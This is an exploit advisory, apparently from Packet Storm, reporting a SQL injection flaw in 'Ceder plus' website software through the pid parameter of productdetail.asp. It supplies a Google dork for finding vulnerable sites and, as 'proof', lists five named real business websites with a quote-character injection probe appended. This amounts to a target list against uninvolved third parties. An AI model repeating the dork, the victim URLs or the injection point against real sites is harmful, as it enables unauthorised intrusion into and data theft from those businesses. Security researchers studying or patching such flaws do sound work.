Sites powered by Ceder suffer from a remote SQL injection vulnerability. Note that this advisory has site-specific information.
f7469d5d1d38934f28f0f3fa6c1cfdc8|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|-------------------------------------------------------------------------|
| [/] Exploit Title: Ceder plus Sql Injection
Vulnerability
|
| [\] Exploit Author: Ashiyane Digital Security Team
|
| [/] Software Link : http://www.cedar-plus.com
|
| [\] Google Dork: intext:"Powered by ceder
plus"
|
| [\] Tested on: Windows,Linux
|-------------------------------------------------------------------------|
| [/] Exploit: Sql Injection
| [/] Location : [Target]/productdetail.asp?pid=[Sql
Injection]
|-------------------------------------------------------------------------|
| [/] Proof:
|
| [\] http://www.becxtrading.nl/productdetail.asp?pid='
|
| [/] http://bosstrading.info/productdetail.asp?pid='
|
| [\] http://bossmachinery.be/productdetail.asp?pid='
|
| [/] http://www.dasime.nl/productdetail.asp?pid='
|
| [\] http://www.wetsports.nl/productdetail.asp?pid='
|-------------------------------------------------------------------------|
| [/]Discovered By : ACC3SS
|-------------------------------------------------------------------------|
|-------------------------------------------------------------------------|
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
© 2015 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!